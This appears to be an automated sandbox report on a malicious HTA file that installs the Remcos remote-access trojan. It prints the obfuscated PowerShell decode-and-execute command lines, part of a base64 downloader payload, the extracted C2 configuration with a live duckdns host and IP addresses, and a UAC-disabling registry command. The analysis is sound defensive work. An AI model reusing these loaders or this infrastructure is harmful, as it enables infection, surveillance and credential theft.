Windows Analysis Report
clearentirethingwithbestnoticetheeverythinggooodfrome.hta

Overview

General Information

Sample name: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Analysis ID: 1575615
MD5: 5215d83b478d7a718062863c5efbbeeb
SHA1: 9ac735295a8b3bc10740d50669f6fa5c81ae10ce
SHA256: af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
Tags: hta, user-lontze7

Detection

Cobalt Strike, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7372 cmdline: mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7484 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7528 cmdline: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7728 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 1220 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown |
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
12.2.CasPol.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
12.2.CasPol.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
12.2.CasPol.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
12.2.CasPol.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
amsi32_7776.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_7776.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", ProcessId: 7656, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", CommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgI

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", ProcessId: 7656, ProcessName: csc.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: F5 A3 53 53 9D B0 38 4A 1A F4 EC 2A 3F 9B 2F 71 68 8F 17 D1 D4 54 6E DC A6 CC 9A 91 B5 68 D6 65 BE E0 C7 FD 44 A2 FD 6C 27 38 9E A2 C6 58 9B A6 01 1F 5A B8 A8 09 69 77 1E F9 91 82 1F C9 C7 97 A7 48 B7 EC 86 C6 FD 67 C1 3B 7D 4F 0B 09 90 2F F1 4A 6E 00 27 40 92 D5 31 21 0D 62 08 B3 3F 1D 60 D5 51 7A 81 13 87 DB C2 78 7F 25 12 F5 40 DA AB 45 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B3IX49\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T07:12:32.511096+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:32.511096+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:35.200213+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 107.173.143.31 | 14646 | TCP
2024-12-16T07:12:37.309488+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 107.173.143.31 | 14646 | TCP
2024-12-16T07:12:37.593144+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 178.237.33.50 | 80 | TCP
2024-12-16T07:12:33.462037+0100 | 2858295 | 1 | A Network Trojan was detected | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:04.055751+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 192.3.122.159 | 80 | TCP
2024-12-16T07:12:32.099411+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 172.67.187.200 | 443 | TCP


AV Detection

Source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta | Virustotal: Detection: 27%
Source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta | ReversingLabs: Detection: 13%
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043294A
Source: powershell.exe, 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_7b925e78-e

Exploits

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
